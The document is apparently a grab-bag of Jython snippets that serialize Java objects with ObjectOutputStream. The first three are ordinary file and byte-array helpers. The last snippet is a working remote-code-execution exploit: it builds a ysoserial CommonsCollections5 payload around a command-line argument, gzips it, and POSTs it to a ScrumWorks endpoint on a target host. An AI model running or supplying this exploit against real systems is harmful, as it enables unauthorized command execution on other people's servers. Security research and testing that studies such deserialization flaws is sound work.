def output_serialized_model(key, model): baos = ByteArrayOutputStream() oos = ObjectOutputStream(baos) oos.writeObject(model) oos.flush() oos.close() return baos.toByteArray()
def run(self): while 1: print "Writing out channels", Date() ostream = FileOutputStream(self.filename) p = ObjectOutputStream(ostream) p.writeObject(self.registry.getChannelGroup("Default")) p.flush() ostream.close() self.sleep(self.delay)
def serialize(obj, filepath): if not Serializable.isAssignableFrom(obj.getClass()): syncPrintQ("Object doesn't implement Serializable: " + str(obj)) return False f = None o = None try: f = FileOutputStream(filepath) o = ObjectOutputStream(f) o.writeObject(obj) o.flush() f.getFD().sync() # ensure file is written to disk return True except: syncPrintQ(sys.exc_info()) finally: if o: o.close() if f: f.close()
payloadName = "CommonsCollections5" payloadClass = ObjectPayload.Utils.getPayloadClass(payloadName); if payloadClass is None: print("Can't load ysoserial payload class") exit(2); # serialize payload payload = payloadClass.newInstance() exploitObject = payload.getObject(sys.argv[3]) # create streams byteStream = ByteArrayOutputStream() zipStream = GZIPOutputStream(byteStream) objectStream = ObjectOutputStream(zipStream) objectStream.writeObject(exploitObject) # close streams objectStream.flush() objectStream.close() zipStream.close() byteStream.close() # http request print "sending serialized command" conn = httplib.HTTPConnection(sys.argv[1] + ":" + sys.argv[2]) conn.request("POST", "/scrumworks/UFC-poc-", byteStream.toByteArray()) response = conn.getresponse() conn.close() print "done" ---